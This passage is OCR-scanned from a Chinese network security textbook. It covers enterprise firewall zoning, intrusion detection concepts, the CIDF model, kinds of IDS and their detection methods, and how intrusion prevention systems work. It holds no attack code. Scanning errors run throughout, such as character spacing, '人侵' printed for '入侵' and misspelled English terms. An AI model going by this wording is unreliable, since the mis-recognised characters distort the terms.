和 “研发 部 2” 同属 于 Research 安全 区 域 .但 是 两 者 间 通 信 的 流量 仍 可 进行 简单 的 包 过 滤 、 黑 
白 名 单 、 反 病毒 等 处 理 。 

不 同安 全 等 级 的 网 络 划 分 到 不 同 的 安全 区 域 ,根据 业务 需求 部 署 不 同 的 安全 功能 ,例如 
仅 允 许 部 分 研发 网 络 主机 访问 指定 的 市 场 部 主机 ,并 在 Research 与 Marketing、 
Production、Server 之 间 应 用 反 病 毒 、 文 件 类 型 过 滤 、 内 容 过 滤 等 功能 。 

在 各 个 区 域 之 间 应 用 带宽 策略 ,控制 带宽 与 连接 数 ,避免 内 网 网 络 拥塞 。 

内 网 各 个 区 域 与 外 网 之 间 应 用 入 侵 防 御 、 反 病毒 文件 类 型 过 滤 、 内 容 过 滤 、 应 用 行为 控 
制 .URL 过 滤 等 功能 。 

大 中 型 企业 边界 防护 

大 中 型 企业 通常 是 指 员 工人 数 在 500 人 以 上 的 企业 ,通常 具有 以 下 业务 特征 : 

(1) 企业 人 员 众 多 ,业务 复杂 ,流量 构成 丰富 多 样 。 

(2) 对 外 提供 网 络 服务 ,例如 公司 网 站 .邮件 服务 等 。 

(3) 容易 成 为 DDoS 攻击 的 目标 ,而 且 一 旦 攻击 成 功 , 业 务 损失 巨大 。 

(4) 对 设备 可 靠 性 要 求 较 高 ,需要 边界 设备 支持 持续 大 流量 运行 ,即使 设备 故障 也 不 能 
影响 网 络 运转 。 

基于 以 上 特征 ,USG6000 作为 大 中 型 企业 的 出 口 网 关 ,来 对 企业 的 网 络 安全 进行 防护 。 
典型 的 应 用 场景 如 图 4-16 所 示 。 

将 企业 员工 网 络 、 公 司 服务 器 网 络 、 外 部 网 络 划 分 到 不 同安 全 区 域 ,对 安全 区 域 间 的 流 
量 进 行 检测 和 保护 。 

根据 公司 对 外 提供 的 网 络 服务 的 类 型 开启 相应 的 内 容 安全 防护 功能 。 例 如 针对 图 4-16 
中 的 文件 服务 器 开启 文件 过 滤 和 内 容 过 滤 ,针对 邮件 服务 器 开启 邮件 过 滤 ,并 且 针 对 所 有 服 
务 器 开启 反 病 毒 和 入 侵 防御 。 

针对 内 网 员工 访问 外 部 网 络 的 行为 .开启 URL 过 滤 、 文 件 过 滤 、 内 容 过 滤 、 应 用 行为 控 
制 、 反 病毒 等 功能 , 既 保 护 内 网 主机 不 受 外 网 威胁 ,又 可 以 防止 企业 机 密 信 息 的 泄露 ,提高 企 
业 网 络 的 安全 性 。 

在 USG6000 与 出 差 员 工 、 分 支 机 构 间 建立 VPN 隧道 ,使 用 VPN 保护 公司 业务 数据 ， 
使 其 在 Internet 上 安全 传输 。 
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图 4-16 大 中 型 企业 边界 防护 典型 部 署 


开启 DDoS 防御 功能 ,抵抗 外 网 主机 对 内 网 服务 器 进行 的 大 流量 攻击 ,保证 企业 业务 的 
正常 开展 。 

针对 内 外 网 之 间 的 流量 部 署 带 宽 策 略 ,控制 流量 带宽 和 连接 数 ,避免 网 络 拥塞 ,同时 也 
可 辅助 进行 DDoS 攻击 的 防御 。 


4.3 人 侵 检测 技术 


入 侵 检测 技术 也 称 为 网 络 实时 监控 技术 ,是 指 通过 硬件 或 软件 对 网 络 上 的 数据 流 进行 
实时 的 检查 ,并 与 系统 中 的 人 侵 特 征 数据 库 进 行 比 较 , 一 旦 发 现 有 被 攻击 的 迹象 ,立刻 根据 
用 户 所 定义 的 动作 做 出 反应 ,如 切断 网 络 连接 ,或 者 通知 防火 墙 系统 对 访问 控制 策略 进行 调 
整 , 将 人 侵 的 数据 包 过 滤 掉 等 。 

入 侵 检测 技术 是 一 种 主动 保护 自己 免 受 攻击 的 网 络 安全 技术 。 作 为 防火 墙 的 合理 补 
充 , 入 侵 检 测 技术 能 够 帮助 系统 对 付 网 络 攻 击 ,扩展 了 系统 管理 员 的 安全 能 力 ,包括 安 全 利 
计 、 监 视 , 攻 击 识别 和 响应 ,提高 了 信息 安全 基础 结构 的 完整 性 。 入 侵 检测 被 认为 是 防火 墙 
之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 检测 。 


4.3.1 入 侵 检 测 系 统 定义 


1. 入 侵 检测 定义 

网 络 入 侵 是 目前 最 受 关注 ,也 是 影响 最 大 的 网 络 攻 击 行 为 。 网 络 入 侵 (Intrusion) 是 对 
接 入 网 络 的 计算 机 系统 的 非法 入 侵 , 即 攻击 者 未 经 合法 的 手段 和 程序 而 取得 了 使 用 该 系统 
资源 的 权限 , 泛 指 任何 试图 危害 资源 的 完整 性 .可 信和 度 和 可 获取 性 的 动作 。 

网 络 入 侵 的 目的 有 多 种 : 取得 使 用 系统 的 存储 能 力 、 处 理 能 力 以 及 访问 其 存储 内 容 的 
权限 ; 作为 进入 其 他 系统 的 跳板 ; 试图 破坏 这 个 系统 (使 其 毁坏 或 丧失 服务 能 力 ) 。 
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入 侵 检测 (Intrusion Detection) 是 对 入 侵 行 为 的 检测 。 即 发 现 或 确定 入 侵 行为 存在 或 
出 现 的 动作 。 也 就 是 发 现 、 跟 踪 并 记录 计算 机 系统 或 计算 机 网 络 中 的 非 授权 行为 ,或 发 现 并 
调查 系统 中 可 能 为 试图 入 侵 或 病毒 感染 所 带 来 的 异常 活动 。 

入 侵 检测 作为 一 种 积极 主动 的 安全 防御 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 
实时 保护 ,在 网 络 系 统 受 到 危害 之 前 拦截 和 响应 入 侵 。 入 侵 检 测 通 过 执行 以 下 任务 来 实现 : 
监视 ,分 析 用 户 及 系统 活动 ; 系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 
相关 人 士 报警 ; 异常 行为 模式 的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ; 操作 系统 
的 审计 跟踪 管理 ,并 识别 用 户 违反 安全 策略 的 行为 。 

采用 入 侵 检 测 技术 的 设备 称 为 和 人 侵 检 测 系统 (Intrusion Detective System,IDS) ,通常 
按照 部 署 的 位 置 和 所 起 的 作用 不 同 ,分 为 基于 主机 的 IDS 和 基于 网 络 的 IDS。 

IDS 从 计算 机 网 络 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信息 ,检测 网 络 中 是 否 有 违反 
安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 将 入 侵 检 测 的 软件 与 硬件 进行 组 合 便 是 入 侵 检测 系 
统 。 它 是 一 种 对 网 络 传 输 进行 即时 监视 ,在 发 现 可 疑 传输 时 发 出 警报 或 者 采取 主动 反应 措 
施 的 网 络 安 全 设备 。 与 其 他 网 络 安全 设备 的 不 同 之 处 在 于 ,IDS 采用 积极 主动 的 安全 防御 
技术 。 

在 允许 各 种 网 络 资源 以 开发 方式 运作 的 前 提 下 ,入 侵 检测 系统 成 了 确保 网 络 安全 的 一 
种 新 的 手段 , 它 通 过 实时 的 分 析 ,检查 特 定 的 攻击 模式 、 系 统 配 置 、 系 统 漏洞 .存在 缺陷 的 程 
序 以 及 系统 或 用 户 的 行为 模式 ,监控 与 安全 有 关 的 活动 。 

通用 入 侵 检 测 模型 (Common Intrusion Detection Framework,CIDF) 将 IDS 需要 分 析 
的 数据 统称 为 事件 (event) , 它 可 以 是 基于 网 络 的 IDS 从 网 络 中 提取 的 数据 包 , 也 可 以 是 基 
于 主机 的 IDS 从 系统 日 志 等 其 他 途径 得 到 的 数据 信息 。CIDF 将 一 个 人 侵 检测 系统 分 为 以 
下 组 件 : 

(1) 事件 产生 器 (Event generator) 一 一 事件 产生 器 的 任务 是 从 入 侵 检 测 系统 外 的 整个 
计算 环境 中 获得 事件 ,并 将 这 些 事件 转化 成 CIDF 的 GIDO (Generalized Instrusion 
Detection Object ,统一 入侵 检测 对 象 ) 格 式 传送 给 其 他 组 件 。 事 件 产生 器 是 所 有 IDS 所 需 
要 的 ,同时 也 是 可 以 重用 的 。 

(2) 事件 分 析 器 (Event analyzer) 一 一 从 其 他 组 件 接收 GIDO ,分 析 得 到 的 数据 ,并 产生 
新 的 GIDO 再 传送 给 其 他 组 件 。 例 如 ,分 析 器 可 以 是 一 个 轮廓 描述 工具 ,统计 性 地 检查 现在 
的 事件 是 否 可 能 与 以 前 某 个 事件 来 自 同一 个 时 间 序 列 ; 也 可 以 是 一 个 特征 检测 工具 ,用 于 
在 一 个 事件 序列 中 检查 是 否 有 已 知 的 滥用 攻击 特征 ; 此 外 ,事件 分 析 器 还 可 以 是 一 个 相关 
器 ,观察 事件 之 间 的 关系 ,将 有 联系 的 事件 放 在 一 起 ,以 利于 以 后 的 进一步 分 析 。 

(3) 响应 单元 (Response unit) 一 一 是 对 分 析 结 果 做 出 反应 的 功能 单元 , 它 可 以 终止 进 
程 、 重 置 连接 、 改 变 文件 属性 等 ,也 可 以 只 是 简单 的 报警 。 

(4) 事件 数据 库 (Event database) 一 一 是 存放 各 种 中 间 和 最 终 数 据 的 地 方 的 统称 , 它 可 
以 是 复杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 

2. 入 侵 检 测 系统 的 功能 

入侵 检 测 系统 的 功能 有 以 下 几 个 方面 。 

(1) 监视 用 户 和 系统 的 运行 情况 ,查找 非法 用 户 和 合法 用 户 的 越权 操作 。 

(2) 检测 系统 配置 的 正确 性 和 安全 漏洞 ,并 提示 管理 员 修补 漏洞 。 
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(3) 对 用 户 的 非 正 常 活动 进行 统计 分 析 ,发 现 人 侵 行为 的 规律 。 

(4) 检查 系统 程序 和 数据 的 一 致 性 和 正确 性 。 

(5) 通过 检测 和 记录 网 络 中 的 安全 违规 行为 ,惩罚 网 络 犯罪 ,防止 网 络 人 侵 事 件 发 生 。 

(6) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

(7) 识别 已 知 的 攻击 行为 和 统计 分 析 异 常 行为 。 

(8) 操作 系统 日 志 管 理 ,并 识别 违反 安全 策略 的 用 户 活动 。 

3. 入 侵 检 测 系 统 的 分 类 

1) 基于 数据 源 的 分 类 

人 侵 检测 系统 首先 要 解决 的 问题 是 数据 源 。 和 人 侵 检 测 系统 根据 其 检查 数据 的 来 源 可 分 
为 两 类 : 基于 主机 的 人 侵 检测 系统 和 基于 网 络 的 入 侵 检测 系统 。 

(1) 基于 主机 的 人 侵 检测 系统 。 系 统 检测 目标 是 主机 系统 和 系统 本 地 用 户 , 原 理 是 根 
据 主 机 的 审计 数据 和 系统 日 志 发 现 可 疑 事件 。 

这 种 类 型 的 IDS 是 利用 主机 操作 系统 及 应 用 程序 的 审核 踪迹 作为 输入 的 主要 数据 来 
源 来 检测 入 侵 , 主要 是 对 该 主机 的 网 络 实时 连接 ,以 及 系统 审计 日 志 进 行 智 能 分 析 和 判断 ， 
如 果 其 中 的 主体 活动 十 分 可 疑 ,IDS 就 会 采取 相应 的 措施 。 

系统 通常 被 安装 在 重点 检测 的 主机 或 服务 器 上 ,实时 检测 主机 安全 性 方面 的 数据 诸如 
计算 机 操作 系统 的 事件 日 志 、 应 用 程序 的 事件 日 志 、 系 统 调 用 、 端 口 调用 和 安全 审计 记录 等 ， 
其 效果 依赖 于 数据 的 准确 性 以 及 安全 事件 的 定义 。 

基于 主机 的 和 人 侵 检测 系统 被 设计 成 检测 IDS 代理 所 驻 留 的 宿主 机 ,可 以 检测 到 网 络 协 
议 的 高 层 数据 ,也 可 检测 到 被 监视 主机 上 的 本 地 活动 。 

基于 主机 的 入 侵 检 测 系 统 和 基于 主机 的 防火 墙 通过 监测 和 阻塞 未 请 求 的 数据 包 来 检测 
DoS 企图 。 尽 管 安装 数 以 百 计 的 基于 主机 的 IDS 设备 有 这 种 可 能 ,但 实际 操作 难度 较 大 ， 
也 不 实际 。 安 装 、 配 置 及 持续 监控 这 些 设备 所 花费 成 本 较 大 ,实施 性 较 差 。 从 最 低 程 度 上 
讲 , 建 议 对 放置 在 隔离 区 中 的 服务 器 配置 某 种 形式 的 软件 防火 墙 ,协助 阻止 针对 该 服务 器 的 
Dos 攻击 或 其 他 攻击 。 

(2) 基于 网 络 的 入侵 检测 系统 (NIDS) 。NIDS 捕获 并 分 析 网 络 上 的 数据 包 , 包 括 分 析 
其 是 否 具 有 已 知 的 攻击 模式 ,以 此 来 判别 是 否 为 入 侵 者 。 

NIDS 系统 担负 着 保护 整个 网 段 的 任务 ,基于 网 络 的 入 侵 检 测 系统 由 遍及 网 络 的 传 感 
器 (sensor) 组 成 。 传 感 器 是 一 台 将 以 太 网 卡 置 于 混杂 模式 的 计算 机 ,用 于 嗅 探 网 络 上 的 数 
据 包 。 当 该 模型 发 现 某 些 可 疑 的 现象 时 也 一 样 会 产生 告警 ,并 会 向 一 个 中 心 管理 站 点 发 出 
“告警 ”信和 号。 

NIDS 在 比较 重要 的 网 段 内 不 停 地 监视 网 段 中 的 各 种 数据 包 , 对 每 一 个 数据 包 或 可 疑 
的 数据 包 进 行 特征 分 析 , 如 果 数 据 包 与 产品 内 置 的 某 些 规则 吻合 ,IDS 就 会 发 出 警报 甚至 自 
动 切断 网 络 连接 。 此 外 ,基于 网 络 的 IDS, 还 能 够 分 析 和 评估 网 络 流量 ,及 时 发 现 可 能 的 
DoS 攻击 。IDS 通常 作为 监视 已 知 DoS 攻击 的 常用 工具 ,它们 在 攻击 发 生 时 能 及 时 发 出 警 
报 并 采取 相应 的 措施 。 

2) 基于 检测 技术 的 分 类 

根据 采用 检测 技术 的 不 同 可 将 入 侵 检 测 系统 分 为 异常 检测 模型 和 误 用 检测 模型 两 种 。 

(1) 异常 检测 (Anomaly Detection) 模 型 : 根据 使 用 者 的 行为 或 资源 使 用 状况 的 正常 程 
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度 来 判断 是 否 人 侵 , 而 不 依赖 于 具体 行为 是 否 出 现 异常 来 检测 。 异 常 检测 与 系统 相对 无 关 ， 
通用 性 较 强 。 但 由 于 不 可 能 对 整个 系统 内 的 所 有 用 户 行为 进行 全 面 描述 ,而 且 每 个 用 户 的 
行为 是 经 常 改变 的 ,所 以 它 的 主要 缺陷 在 于 误 检 率 很 高 ,尤其 在 用 户 数据 众多 ,或 工作 方式 
经 常 改变 的 环境 中 。 

(2) 误 用 检测 (Misuse Detection) 模 型 : 根据 已 定义 好 的 人 侵 模式 ,通过 判断 在 实际 的 
安全 审计 数据 中 是 否 出 现 这 种 人 侵 模 式 来 完成 检测 功能 。 这 种 方法 由 于 依据 具体 特征 库 进 
行 判断 ,所 以 检测 准确 度 很 高 ,并且 因 为 检测 结果 有 明确 的 参照 ,也 为 系统 管理 员 及 时 采取 
相应 措施 提供 了 方便 。 误 用 检测 的 主要 缺陷 在 于 检测 范围 受 已 有 知识 的 局 限 , 无 法 检测 未 
知 的 攻击 类 型 。 另 外 检测 系统 对 目标 的 依赖 性 太 强 ,不 但 系统 移植 性 不 好 ,维护 工作 量 大 ， 
而 且 将 具体 和 人 侵 手段 抽象 成 知识 也 是 比较 困难 的 。 

异常 检测 和 误 用 检测 各 有 优势 ,又 各 有 不 足 。 在 实际 系统 中 ,可 考虑 将 两 者 结合 起 来 使 
用 ,如 将 异常 检测 用 于 系统 日 志 分 析 , 将 误 用 检测 用 于 数据 网 络 包 的 检测 ,这 是 目前 比较 通 
用 的 方法 。 

3) 基于 工作 方式 的 分 类 

人 侵 检测 系统 根据 工作 方式 分 为 离线 检测 系统 和 在 线 检测 系统 。 

(1) 离线 检测 系统 : 离线 检测 系统 是 非 实 时 工作 的 系统 , 它 在 事后 分 析 审计 事件 ,从 中 
检查 人 侵 活动 。 事 后 人 侵 检 测 由 网 络 管理 人 员 进 行 ,他 们 具有 网 络 安全 的 专业 知识 ,可 根据 
计算 机 系统 对 用 户 操作 所 做 的 历史 审计 记录 判断 是 否 存在 人 侵 行为 ,如 果 有 就 断 开 连接 ,并 记 
录入 侵 证 据 和 进行 数据 恢复 。 事 后 入 侵 检测 是 管理 员 定 期 或 不 定期 进行 的 ,不 具有 实时 性 。 

(2) 在 线 检测 系统 : 在 线 检测 系统 是 实时 联机 的 检测 系统 , 它 包 含 对 实时 网 络 数据 包 
分 析 和 实时 主机 审计 分 析 。 其 工作 过 程 是 实时 人 侵 检 测 在 网 络 连接 过 程 中 进行 ,系统 根据 
用 户 的 历史 行为 模型 .存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进 
行 判断 ,一 旦 发 现 和 人 侵 迹 象 立 即 断 开 入 侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 。 这 
个 检测 过 程 是 不 断 循环 进行 的 。 


4.3.2 ”入侵 检测 方法 与 过 程 


1. 入 侵 检 测 过 程 

入 侵 检 测 过 程 分 为 3 部 分 : 信息 收集 、 信 息 分 析 和 结果 处 理 。 

1) 信息 收集 

入 侵 检 测 的 第 一 步 是 信息 收集 ,收集 内 容 包 括 系 统 、 网 络 、 数 据 及 用 户 活动 的 状态 和 行 
为 。 由 放置 在 不 同 网 段 的 传感器 或 不 同 主机 的 代理 来 收集 信息 ,包括 系统 和 网 络 日 志文 件 、 
网 络 流量 、 非 正常 的 目录 和 文件 改变 、 非 正常 的 程序 执行 。 

2) 信息 分 析 

收集 到 的 有 关系 统 、 网 络 .数据 及 用 户 活 动 的 状态 和 行为 等 信息 ,被 送 到 检测 引擎 ,检测 
引擎 驻 留 在 传感器 中 ,一般 通 过 3 种 技术 手段 进行 分 析 : 模式 匹配 、 统 计 分 析 和 完整 性 分 
析 。 其 中 前 两 种 方法 用 于 实时 的 和 人 侵 检测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

(1) 模式 匹配 。 模 式 匹配 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 
库 进行 比较 ,从 而 发 现 违背 安全 策略 的 行为 。 该 方法 的 一 大 优点 是 只 需 收集 相关 的 数据 集 
合 ,显著 减少 系统 负担 , 且 技 术 已 相当 成 熟 。 它 的 检测 准确 度 和 效率 都 很 高 。 但 是 ,该 方法 
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存在 的 弱点 是 需要 不 断 地 升级 以 对 付 不 断 出 现 的 黑客 攻击 手法 ,不 能 检测 到 从 未 出 现 过 的 
黑客 攻击 手段 。 

(2) 统计 分 析 。 统 计 分 析 方法 是 首先 给 系统 对 象 (如 用 户 文件 .目录 和 设备 等 ) 创 建 一 
个 统计 描述 ,统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 .操作 失败 次 数 和 延 时 等 )。 测 量 
属性 的 平均 值 将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ,任何 观察 值 在 正常 值 范 围 之 外 时 ,就 
认为 有 入 侵 发 生 。 其 优点 是 可 检测 到 未 知 的 入 侵 和 更 为 复杂 的 入 侵 ,缺点 是 误 报 、 漏 报 率 
高 , 且 不 适应 用 户 正 常 行为 的 突然 改变 。 

(3) 完整 性 分 析 。 完 整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 这 经 常 包 括 文件 
和 目录 的 内 容 及 属性 , 它 在 发 现 被 更 改 的 应 用 程序 方面 特别 有 效 。 完 整 性 分 析 利 用 强 有 力 
的 加 密 机 制 , 称 为 消息 摘要 函数 (例如 MD5), 它 能 识别 哪怕 是 微小 的 变化 。 其 优点 是 不 管 
模式 匹配 方法 和 统计 分 析 方 法 能 否 发 现 入 侵 , 只 要 是 因 成 功 的 攻击 而 导致 了 文件 或 其 他 对 
象 的 任何 改变 , 它 都 能 够 发 现 。 缺 点 是 一 般 以 批 处 理 方式 实现 ,不 用 于 实时 响应 。 尽 管 如 
此 ,完整 性 检测 方法 还 应 该 是 网 络 安全 产品 的 必要 手段 之 一 。 

3) 结果 处 理 

控制 台 按照 告警 产生 预先 定义 的 响应 采取 相应 措施 ,可 以 是 重新 配置 路 由 器 或 防火 墙 、 
终止 进程 .切断 连接 改变 文件 属性 ,也 可 以 只 是 简单 的 告警 。 

2. 常用 的 入 侵 检测 方法 


常用 的 和 人 侵 检测 方法 有 3 种 : 

1) 静态 配置 分 析 

静态 配置 分 析 通 过 检查 系统 的 当前 配置 ,诸如 系统 文件 的 内 容 或 者 系统 表 ,来 检查 系统 
是 否 已 经 或 者 可 能 会 遭 到 破坏 。 静 态 是 指 检查 系统 的 静态 特征 (系统 配置 信息 ), 而 不 是 系 
统 中 的 活动 。 

采用 静态 分 析 方 法 主要 有 以 下 几 方 面 的 原因 : 入 侵 者 对 系统 攻击 时 可 能 会 留 下 痕迹 ， 
这 可 通过 检查 系统 的 状态 检测 出 来 ; 系统 管理 员 以 及 用 户 在 建立 系统 时 难免 会 出 现 一 些 错 
误 或 遗漏 一 些 系统 的 安全 性 措施 ; 另外 ,系统 在 遭受 攻击 后 ,入 侵 者 可 能 会 在 系统 中 安装 一 
些 安全 性 后 门 以 方便 对 系统 进行 进一步 的 攻击 。 

所 以 ,使 用 静态 配置 分 析 方法 时 需要 尽 可 能 了 解 系统 的 缺陷 ,否则 入 侵 者 只 需要 简单 地 
利用 那些 系统 中 未 知 的 安全 缺陷 就 可 以 避 开 检测 系统 。 

2) 异常 性 检测 方法 

异常 性 检测 技术 是 一 种 在 不 需要 操作 系统 及 其 防范 安全 性 缺陷 专门 知识 的 情况 下 ,就 
可 以 检测 入 侵 者 的 方法 ,同时 它 也 是 检测 冒充 合法 用 户 的 入 侵 者 的 有 效 方法 。 但 是 ,在 许多 
环境 中 ,为 用 户 建立 正常 行为 模式 的 特征 轮廓 以 及 对 用 户 活动 的 异常 性 进行 报警 的 门限 值 
的 确定 都 是 比较 困难 的 事 , 所 以 仅 使 用 异常 性 检测 技术 不 可 能 检测 出 所 有 的 人 侵 行为 。 

目前 这 类 入 侵 检测 系统 多 采用 统计 或 者 基于 规则 描述 的 方法 建立 系统 主体 的 行为 特征 
轮廓 : 

(1) 统计 性 特征 轮廓 由 主体 特征 变量 的 频 度 .均值 以 及 偏差 等 统计 量 来 描述 ,如 SRI 的 
下 一 代 实 时 入 侵 检 测 专家 系统 ,这 种 方法 对 特洛伊 木马 以 及 欺骗 性 的 应 用 程序 的 检测 非常 
有 效 。 

(2) 基于 规则 描述 的 特征 轮廓 由 一 组 用 于 描述 主体 每 个 特征 的 合法 取 值 范围 与 其 他 特 


170 网 络 安 全 教程 与 实践 (第 2 版 ) 





征 的 取 值 之 间 关 系 的 规则 组 成 (如 TIM) 。 该 方案 还 可 以 采用 从 大 型 数据 库 中 提取 规则 的 
数据 挖掘 技术 。 

(3) 神经 网 络 方法 具有 自学 习 、 自 适应 能 力 , 可 以 通过 自学 习 提取 正常 的 用 户 或 系统 活 
动 的 特征 模式 , 避 开 选择 统计 特征 这 一 难题 。 

3) 基于 行为 的 检测 方法 

通过 检测 用 户 行为 中 那些 与 已 知人 侵 行 为 模式 类 似 的 行为 .那些 利用 系统 中 缺陷 或 间 
接 违背 系统 安全 规则 的 行为 ,来 判断 系统 中 的 入 侵 活动 。 

目前 基于 行为 的 入 侵 检 测 系统 只 是 在 表示 入 侵 模式 (签名 ) 的 方式 以 及 在 系统 的 审计 中 
检查 入 侵 签名 的 机 制 上 有 所 区 别 , 主 要 可 以 分 为 基于 专家 系统 、 基 于 状态 迁移 分 析 和 基于 模 
式 匹 配 等 几 类 。 这 些 方法 的 主要 局 限 在 于 ,只 是 根据 已 知 的 入 侵 序 列 和 系统 缺陷 模式 来 检 
测 系统 中 的 可 疑 行为 ,而 不 能 检测 新 的 人 侵 攻击 行为 以 及 未 知 的 、 潜 在 的 系统 缺陷 。 

入 侵 检 测 方法 虽然 能 够 在 某 些 方面 取得 好 的 效果 ,但 总 体 看 来 各 有 不 足 , 因 而 越 来 越 多 
的 入 侵 检 测 系统 都 同时 采用 几 种 方法 ,以 互补 不 足 , 共 同 完成 检测 任务 。 


4.4 人 侵 防御 系统 


目前 , 随 着 网 络 入侵 事件 的 不 断 增 加 和 黑客 攻击 技术 水 平 的 提高 ,使 得 传统 的 防火 墙 或 
入 侵 检测 系统 已 经 无 法 满足 现代 网 络 安全 的 需要 ,而 人 侵 防 御 系统 (Intrusion Prevention 
System,IPS) 技 术 的 产生 正 是 适应 了 这 种 要 求 。 

防火 墙 是 实施 访问 控制 策略 的 系统 ,对 流 经 的 网 络 流量 进行 检查 ,拦截 不 符合 安全 策略 
的 数据 包 。 入 侵 检测 系统 通过 监视 网 络 或 系统 资源 ,寻找 违反 安全 策略 的 行为 或 攻击 迹象 ， 
并 发 出 报警 。 入 侵 防御 系统 是 一 种 主动 的 积极 的 入 侵 防 范 及 阻止 系统 , 它 部 署 在 网 络 的 进 
出 口 处 , 当 它 检测 到 攻击 企图 后 ,会 自动 地 将 攻击 包 丢 掉 或 采取 措施 将 攻击 源 阻 断 。IPS 的 
检测 功能 类 似 于 IDS, 但 IPS 检测 到 攻击 后 会 采取 行动 阻止 攻击 ,可 以 说 IPS 是 建立 在 IDS 
发 展 的 基础 上 的 新 生 的 网 络 安 全 产品 。 

入 侵 防 御 系 统 的 技术 特征 包括 : 

(1) 嵌入 式 运行 。 只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 ,实时 
阻拦 所 有 可 疑 的 数据 包 , 并 对 该 数据 流 的 剩余 部 分 进行 拦截 。 

(2) 深入 分 析 和 控制 。IPS 必须 具有 深入 分 析 的 能 力 , 以 确定 哪些 恶意 流量 已 经 被 拦 
截 ,根据 攻击 类 型 .策略 等 来 确定 哪些 流量 应 该 被 拦截 。 

(3) 入 侵 特征 库 。 高 质量 的 入 侵 特征 库 是 IPS 高 效 运行 的 必要 条 件 ,IPS 还 应 该 定期 
升级 入 侵 特征 库 ,并 快速 应 用 到 所 有 传感器 。 

(4) 高 效 处 理 能 力 。IPS 必须 具有 高 效 处 理 数据 包 的 能 力 ,对 整个 网 络 性 能 的 影响 保 
持 在 最 低 水 平 。 


4.4.1 入 侵 防御 系统 的 工作 原理 


入 侵 防 御 系 统 提 供 积极 主动 防御 ,其 设计 宗旨 是 预先 对 入 侵 活动 和 攻击 性 网 络 流 进行 
拦截 ,避免 其 造成 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。 入 侵 防御 系 
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统 通过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ,经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 
内 容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 这 样 一 来 ,有 问题 的 数据 包 ,以 及 所 
有 来 自 同一 数据 流 的 后 续 数 据 包 , 都 能 在 入侵 防御 系统 中 被 清除 掉 。IPS 工作 原理 如 图 4-17 
所 示 。 
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图 4-17 入 侵 防 御 系 统 原 理 


在 如 图 4-17 所 示 的 人 侵 防御 系统 中 ,在 中 处 ,根据 报头 和 流 信息 ,每 个 数据 包 都 会 被 分 
类 。 在 @ 处 ,根据 数据 包 的 分 类 ,相关 的 过 滤器 将 被 用 于 检查 数据 包 的 流 状 态 信息 。 在 
@ 处 ,所 有 相关 过 滤器 都 是 并 行使 用 的 ,如 果 任 何 数据 包 符合 匹配 要 求 , 则 该 数据 包 将 被 命 
中 。 在 @ 处 ,被 命中 的 数据 包 将 被 丢弃 ,与 之 相关 的 流 状态 信息 也 会 更 新 ,指示 系统 丢弃 该 
流 中 剩余 的 所 有 内 容 。 

IPS 实现 实时 检查 和 阻止 人 侵 的 原理 在 于 IPS 拥有 数目 众多 的 过 滤器 ,能 够 防止 各 种 
攻击 。 当 新 的 攻击 手段 被 发 现 之 后 ,IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引擎 
是 专业 化 定制 的 集成 电路 ,可 以 深层 检查 数据 包 的 内 容 。 如 果 有 攻击 者 利用 第 二 层 ( 媒 体 访 
问 控 制 ) 至 第 七 层 ( 应 用 ) 的 漏洞 发 起 攻击 ,IPS 能 够 从 数据 流 中 检查 出 这 些 攻 击 并 加 以 阻 
止 。 传 统 的 防火 墙 只 能 对 网 络 层 或 传输 层 进行 检查 ,不 能 检测 应 用 层 的 内 容 。 防 火 墙 的 包 
过 滤 技术 不 会 针对 每 一 字 节 进行 检查 ,因而 也 就 无 法 发 现 攻 击 活动 ,而 IPS 可 以 做 到 逐一 字 
节 地 检查 数据 包 。 所 有 流 经 IPS 的 数据 包 都 被 分 类 ,分 类 的 依据 是 数据 包 中 的 头 部 信息 ,如 
源 IP 地 址 和 目的 IP 地址、 端口 号 和 应 用 域 。 每 种 过 滤器 负责 分 析 相 对 应 的 数据 包 。 通 过 
检查 的 数据 包 可 以 继续 前 进 ,包含 恶意 内 容 的 数据 包 就 会 被 丢弃 ,被 怀疑 的 数据 包 需 要 接受 
进一步 的 检查 。 

针对 不 同 的 攻击 行为 ,IPS 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 过 滤 规 则 ,为 
了 确保 准确 性 ,这 些 规则 的 定义 非常 广泛 。 在 对 传输 内 容 进行 分 类 时 ,过 滤 引 擎 还 需要 参照 
数据 包 的 信息 参数 ,并 将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 , 以 提高 过 滤 准确 性 。 

过 滤器 引擎 集合 了 流水 线 大 规模 并 行 处 理 硬件 ,能 够 同时 执行 数 千 次 的 数据 包 过 滤 检 
查 。 并 行 过 滤 处 理 可 以 确保 数据 包 能 够 不 间断 地 快速 通过 系统 ,不 会 对 速度 造成 影响 。 这 
种 硬件 加 速 技术 对 于 IPS 具有 重要 意义 ,因为 传统 的 软件 解决 方案 必须 串 行 进行 过 滤 检查 ， 
会 导致 系统 性 能 大 打折 扣 。 


4.4.2 入 侵 防御 系统 种 类 
入 侵 防御 系统 分 为 基于 主机 的 入 侵 防 御 、 基 于 网 络 的 入 侵 防御 和 基于 应 用 的 入 侵 防 御 。 


I 网 络 安 全 教程 与 实践 (第 2 版 ) 





